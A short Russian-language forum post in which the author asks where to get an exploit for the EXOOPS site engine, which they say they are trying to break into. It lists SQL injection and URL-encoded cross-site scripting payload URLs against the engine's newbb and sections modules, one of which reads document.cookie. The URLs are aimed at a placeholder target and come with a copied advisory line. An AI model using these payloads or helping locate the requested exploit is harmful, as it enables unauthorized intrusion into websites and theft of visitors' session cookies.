Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только: http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION http://[target]/modules/sections/index.php?op=viewarticle&artid=9,+9,+9 Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://[target]/modules/newbb/viewforum.php? sortname=p.post_time&sortorder=ASC& sortdays=%22%3E%3Cscript%3E alert(document.cookie)%3C/script % 3E&forum=25&refresh=Vai http://[target]/modules/newbb/index.php? viewcat=%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.
